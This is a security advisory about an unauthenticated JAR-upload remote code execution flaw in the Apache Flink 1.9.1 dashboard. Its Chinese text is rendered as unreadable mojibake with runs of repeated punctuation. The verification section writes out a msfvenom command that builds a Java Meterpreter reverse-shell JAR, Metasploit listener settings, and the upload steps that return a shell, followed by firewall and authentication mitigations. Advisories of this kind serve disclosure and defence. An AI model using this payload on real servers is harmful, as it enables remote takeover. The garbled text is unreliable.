Apache Flink ËÁÒâJar°üÉÏ´«µ¼ÖÂÔ¶³Ì´úÂëÖ´Ðзì϶°²È«¹«¸æ
°ä²¼¹¦·ò 2019-11-14·ì϶±àºÅºÍ¼¶±ð
CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨
Ó°Ïì°æ±¾
ÖÁĿǰ×îа汾Apache Flink 1.9.1
·ì϶¸ÅÊö
Apache FlinkÊÇÓÉApacheÈí¼þ»ù½ð»á¿ª·¢µÄ¿ªÔ´Á÷´¦Öÿò¼Ü£¬£¬£¬£¬£¬ÆäÖ÷ÌâÊÇÓÃJavaºÍScala±àдµÄÉ¢²¼Ê½Á÷Êý¾ÝÁ÷ÒýÇæ¡£¡£¡£¡£¡£¡£¡£¡£FlinkÒÔÊý¾Ý²¢ÐкÍÁ÷Ë®Ïß·½Ê½Ö´ÐÐËÁÒâÁ÷Êý¾Ý·¨Ê½£¬£¬£¬£¬£¬FlinkµÄÁ÷Ë®ÏßÔËÐÐʱϵͳÄܹ»Ö´ÐÐÅú´¦ÖúÍÁ÷´¦Ö÷¨Ê½¡£¡£¡£¡£¡£¡£¡£¡£´Ë±í£¬£¬£¬£¬£¬FlinkµÄÔËÐÐʱ×ÔÉíÒ²Ö§³Öµü´úËã·¨µÄÖ´ÐС£¡£¡£¡£¡£¡£¡£¡£
Apache FlinkµÄÊý¾ÝÁ÷±à³ÌÄ£ÐÍÔÚÓÐÏÞºÍÎÞÏÞÊý¾Ý¼¯ÉÏÌṩµ¥´ÎÊÂÎñ£¨event-at-a-time£©´¦Öᣡ£¡£¡£¡£¡£¡£¡£ÔÚ»ù´¡²ãÃæ£¬£¬£¬£¬£¬Flink·¨Ê½ÓÉÁ÷ºÍת»»×é³É¡£¡£¡£¡£¡£¡£¡£¡£
Apache FlinkµÄAPI£ºÓнç»òÎÞ½çÊý¾ÝÁ÷µÄÊý¾ÝÁ÷API¡¢ÓÃÓÚÓнçÊý¾Ý¼¯µÄÊý¾Ý¼¯API¡¢±íAPI¡£¡£¡£¡£¡£¡£¡£¡£
Apache Flink Dashboard ÖпÉÉÏ´«¶ñÒâjar°ü²¢´¥·¢¶ñÒâ´úÂëÖ´ÐС£¡£¡£¡£¡£¡£¡£¡£ÓÉÓÚApache Flink Dashboard ĬÈÏÎÞÐèÈÏÖ¤¼´¿É½Ó¼û£¬£¬£¬£¬£¬Òò¶ø¸Ã·ì϶¿ÉÓÃ×÷»ñÈ¡shell¡£¡£¡£¡£¡£¡£¡£¡£
·ì϶ÑéÖ¤
POC£ºhttps://twitter.com/jas502n/status/1193869996717297664¡£¡£¡£¡£¡£¡£¡£¡£
²âÊÔ»·¾³£ºApache Flink 1.9.1
1¡¢ÉÏ´«msfÌìÉúµÄjar°ü,ÌìÉúrce.jarÎļþ
msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar
2¡¢ÅäÖÃmsf¼àÌý
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 127.0.0.1
set LPORT 8087
show options
run
ÔÚSubmit New Job´¦ÉÏ´«rec.jarÎļþ£¬£¬£¬£¬£¬µã»÷submit
³É¹¦·´µ¯shell£¬£¬£¬£¬£¬Ö´ÐÐid¿É¿´µ½Á˾Ö
½¨¸´½¨Òé
¸Ã·ì϶¹Ù·½ÉÐδ°ä²¼°²È«¸üÐÂÒÔ¼°½â¾ö²½Ö裬£¬£¬£¬£¬ÇëÊÜÓ°ÏìµÄÓû§ÊµÊ±¹Ø×¢Apache Flink¹ÙÍø£ºhttps://flink.apache.org/downloads.html¡£¡£¡£¡£¡£¡£¡£¡£
»º½â´ëÊ©£º
½¨ÒéÉèÖ÷À»ðǽսÊõ£¬£¬£¬£¬£¬½öÔÊÐí°×Ãûµ¥ip½Ó¼û apache flink·þÎñ£¬£¬£¬£¬£¬²¢ÔÚWeb´úÀí£¨Èçapache httpd£©ÖÐÔö³¤¶Ô¸Ã·þÎñµÄdigestÈÏÖ¤¡£¡£¡£¡£¡£¡£¡£¡£
²Î¿¼Á´½Ó
https://twitter.com/jas502n/status/1193869996717297664


¾©¹«Íø°²±¸11010802024551ºÅ